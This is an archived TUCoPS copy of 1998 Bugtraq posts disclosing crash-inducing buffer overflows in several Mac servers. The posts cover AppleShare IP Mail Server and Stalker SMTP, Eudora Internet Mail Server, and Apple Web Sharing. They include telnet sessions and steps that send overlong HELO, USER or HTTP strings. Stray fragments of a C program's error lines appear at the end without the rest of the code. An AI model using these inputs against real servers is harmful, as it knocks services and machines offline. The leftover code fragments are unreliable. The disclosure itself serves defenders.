TUCoPS :: Macintosh :: macapp~1.txt

Mac appleshare stalker smtp overflows


Date: Wed, 8 Apr 1998 13:11:17 +1200
From: Chris Wedgwood <chris@CYBERNET.CO.NZ>
To: BUGTRAQ@NETSPACE.ORG
Subject: AppleShare IP Mail Server

[Yet another buffer overrun? - I hope this isn't getting monotonous]

I noticed this a while back but haven't seen any else mention it.


There appears to be what looks like a buffer overrun problem with AppleShare
IP Mail Server.

If you connect to the SMTP port and issue a long string (say 500 bytes or
so) the server crashes - and because its a Mac, it usually crashed the whole
machine to the point where it needs a reboot.

So far I've only tested against servers which emit the banner 'AppleShare IP
Mail Server 5.0.3'

For example:


$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]

$ ping some.where
[ ...nothing... ]


Physically checking the machine shows it has `locked up' and it a reboot. I
assume if you can cause a crash without the lockup then you might be able to
execute code and so something useful (on a Mac?).




-cw
Date: Wed, 8 Apr 1998 12:34:09 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: AppleShare IP Mail Server

Chris Wedgewood wrote:

> 220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
> HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
> [ and it just hangs ]

Same with

220-Stalker Internet Mail Server V.1.6 is ready.
220 ESMTP is spoken here.
HELO xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[dead]

But then, isn't that expec
fea
ted of using toy machines (Macs/Win PCs) for servers?

David.

Date: Tue, 14 Apr 1998 10:01:05 -0400 (EDT)
From: Netstat Webmaster <feh@netstat.net>
Subject: MacOS based buffer overflows...


Eudora Internet Mail Server vs. 1.2, 2.0, 2.01 DoS

Telnet to port 106 of an EIMS server.
Type USER xxxxxxxxxxxx(at least a 1000+ char string).  EIMS will crash.
Occasionally taking the entire machine with it.

---

Apple's Web Sharing DoS

Telnet to port 80 of a Web Sharing server (built into system 8.0+).
Upon connect enter any string of at least 3000+ characters.  Hit return
twice, Web Sharing will stop servicing.  It does not seem to make the
server any less stable and Web Sharing seems to be able to be restarted
with out a reboot and without any ill effects.

Phanty.

     printf("usage: %s <smtp server>\n", argv[0]);
     exit(1);
     printf("Unknown host: %s\n",argv[1]);
     exit(1);

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH